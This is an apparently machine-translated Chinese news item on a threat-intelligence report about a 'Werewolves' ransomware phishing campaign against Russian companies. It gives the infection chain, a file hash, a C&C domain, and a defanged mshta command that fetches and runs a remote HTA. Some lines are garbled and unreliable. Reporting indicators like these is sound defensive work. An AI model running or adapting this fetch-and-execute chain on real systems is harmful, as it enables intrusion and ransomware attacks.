详细内容或原文请订阅后点击阅览
狼人再次对俄罗斯企业发起大规模攻击
参与者,IT 和金融部门的批准:F.A.C.C.T.遵守新卡帕多瓦政府的规章制度。
来源:安全实验室新闻频道工业、IT 和金融受到攻击:F.A.C.C.T.警告新的勒索软件活动。
来自 F.A.C.C.T. 的网络安全专家威胁情报检测到来自著名黑客组织“狼人”的新一波恶意邮件。这次,攻击者的目标是俄罗斯工业企业、电信和IT公司以及金融和保险组织。
固定据专家称,勒索软件为俄罗斯一家大型特种设备制造商创建了一个虚假网站,使用 HTTrack Website Copier 程序复制原始门户的内容。随后,网络犯罪分子发送了主题为“审前索赔”和“广告”的电子邮件,其中包含下载 Cobalt Strike Beacon 的恶意附件。
攻击进行如下:
- 受害者打开随附的文档“Advertisement.doc”(SHA256:da9e7da207a17076785dbe28d6c7922e81d07e84529f80e7a38265c5316fc8d2),该文档下载了利用CVE-2017-11882漏洞的RTF文档:HTA(HTML应用程序):mshta https。 ://iplis[.] ru/laydowngrenade.jpeg -> hxxp://vlasta-s[.]ru/logistica.hta.HTA 文件执行 PowerShell 命令,解压并运行 Cobalt Strike Stager shellcode。Stager 加载 Cobalt Strike Beacon,其配置包含水印:987654321 和 C&C:poopy[.]aarkhipov[.]ru。